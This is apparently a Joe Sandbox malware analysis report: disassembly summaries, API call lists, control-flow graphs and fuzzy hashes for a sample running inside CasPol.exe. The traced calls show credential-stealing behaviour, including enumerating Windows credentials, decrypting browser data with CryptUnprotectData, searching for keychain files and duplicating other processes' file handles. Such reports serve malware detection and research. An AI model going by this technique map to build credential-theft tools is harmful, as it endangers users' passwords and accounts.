                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 767404330-0
                                                                                                                                                                                                                    • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFind$FirstNext
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1690352074-0
                                                                                                                                                                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InfoSystemmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3558857096-0
                                                                                                                                                                                                                    • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 44 44558e-445594 call 444b06 4->44 45 44557e-445580 call 4136c0 4->45 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 37 445823-445826 14->37 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 49 445879-44587c 18->49 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 82 445685 21->82 83 4456b2-4456b5 call 40b1ab 21->83 31 445605-445607 22->31 32 445603 22->32 29 4459f2-4459fa 23->29 30 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->30 132 44592d-445945 call 40b6ef 24->132 133 44594a 24->133 39 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 29->39 40 445b29-445b32 29->40 151 4459d0-4459e8 call 40b6ef 30->151 152 4459ed 30->152 31->21 43 445609-44560d 31->43 32->31 50 44584c-445854 call 40b1ab 37->50 51 445828 37->51 181 445b08-445b15 call 40ae51 39->181 52 445c7c-445c85 40->52 53 445b38-445b96 memset * 3 40->53 43->21 47 44560f-445641 call 4087b3 call 40a889 call 4454bf 43->47 44->3 63 445585-44558c call 41366b 45->63 148 445665-445670 call 40b1ab 47->148 149 445643-445663 call 40a9b5 call 4087b3 47->149 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 50->13 66 44582e-445847 call 40a9b5 call 4087b3 51->66 59 445d1c-445d25 52->59 60 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 52->60 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 53->67 68 445b98-445ba0 53->68 87 445fae-445fb2 59->87 88 445d2b-445d3b 59->88 167 445cf5 60->167 168 445cfc-445d03 60->168 63->44 64->19 80 445884-44589d call 40a9b5 call 4087b3 65->80 135 445849 66->135 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 154 44589f 80->154 81->52 97 44568b-4456a4 call 40a9b5 call 4087b3 82->97 114 4456ba-4456c4 83->114 102 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->102 103 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->103 156 4456a9-4456b0 97->156 161 445d67-445d6c 102->161 162 445d71-445d83 call 445093 102->162 196 445e17 103->196 197 445e1e-445e25 103->197 128 4457f9 114->128 129 4456ca-4456d3 call 413cfa call 413d4c 114->129 128->6 172 4456d8-4456f7 call 40b2cc call 413fa6 129->172 132->133 133->23 135->50 148->114 149->148 151->152 152->29 154->64 156->83 156->97 174 445fa1-445fa9 call 40b6ef 161->174 162->87 167->168 179 445d05-445d13 168->179 180 445d17 168->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->59 200 445b17-445b27 call 40aebe 181->200 201 445aa3-445ab0 call 40add4 181->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->40 201->181 218 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->218 242 445e62-445e69 202->242 243 445e5b 202->243 223 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->223 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->181 223->87 255 445f9b 223->255 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->52 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->223 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                    • API String ID: 1963886904-3798722523
                                                                                                                                                                                                                    • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                                    • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                    • API String ID: 2744995895-28296030
                                                                                                                                                                                                                    • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                                                                    • CopyFileW.KERNEL32(00445FAE,?,00000000), ref: 0040B82D
                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 0040B838
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                                                    • String ID: chp$v10
                                                                                                                                                                                                                    • API String ID: 1297422669-2783969131
                                                                                                                                                                                                                    • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                    • UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                    • String ID: bhv
                                                                                                                                                                                                                    • API String ID: 4234240956-2689659898
                                                                                                                                                                                                                    • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 560 413f4f-413f52 561 413fa5 560->561 562 413f54-413f5a call 40a804 560->562 564 413f5f-413fa4 GetProcAddress * 5 562->564 564->561
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                    • API String ID: 2941347001-70141382
                                                                                                                                                                                                                    • Opcode ID: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                                                                                                                                                                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 565 4466f4-44670e call 446904 GetModuleHandleA 568 446710-44671b 565->568 569 44672f-446732 565->569 568->569 570 44671d-446726 568->570 571 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 569->571 573 446747-44674b 570->573 574 446728-44672d 570->574 578 4467ac-4467b7 __setusermatherr 571->578 579 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 571->579 573->569 577 44674d-44674f 573->577 574->569 576 446734-44673b 574->576 576->569 580 44673d-446745 576->580 581 446755-446758 577->581 578->579 584 446810-446819 579->584 585 44681e-446825 579->585 580->581 581->571 586 4468d8-4468dd call 44693d 584->586 587 446827-446832 585->587 588 44686c-446870 585->588 591 446834-446838 587->591 592 44683a-44683e 587->592 589 446845-44684b 588->589 590 446872-446877 588->590 596 446853-446864 GetStartupInfoW 589->596 597 44684d-446851 589->597 590->588 591->587 591->592 592->589 594 446840-446842 592->594 594->589 598 446866-44686a 596->598 599 446879-44687b 596->599 597->594 597->596 600 44687c-446894 GetModuleHandleA call 41276d 598->600 599->600 603 446896-446897 exit 600->603 604 44689d-4468d6 _cexit 600->604 603->604 604->586
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2791496988-0
                                                                                                                                                                                                                    • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                                                    • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

